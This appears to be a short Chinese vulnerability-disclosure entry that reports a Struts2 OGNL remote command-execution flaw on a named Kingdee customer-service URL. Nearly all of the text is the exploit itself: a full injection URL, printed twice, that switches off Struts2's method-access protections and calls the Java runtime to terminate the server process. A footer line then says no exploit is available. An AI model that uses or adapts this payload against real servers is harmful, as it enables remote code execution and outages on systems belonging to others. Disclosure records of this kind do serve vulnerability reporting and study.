金蝶某频道命令执行

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 金蝶某频道命令执行 ### 详细说明: struts2框架远程执行漏洞 http://service.kingdee.com/wish/gotoWish.action http://service.kingdee.com/wish/gotoWish.action?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27\u0023rt.exit%281%29%27%29%28\u0023rt\u003d@java.lang.Runtime@getRuntime%28%29%29%29=1 ### 漏洞证明: http://service.kingdee.com/wish/gotoWish.action?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27\u0023rt.exit%281%29%27%29%28\u0023rt\u003d@java.lang.Runtime@getRuntime%28%29%29%29=1

0%
暂无可用Exp或PoC
当前有0条受影响产品信息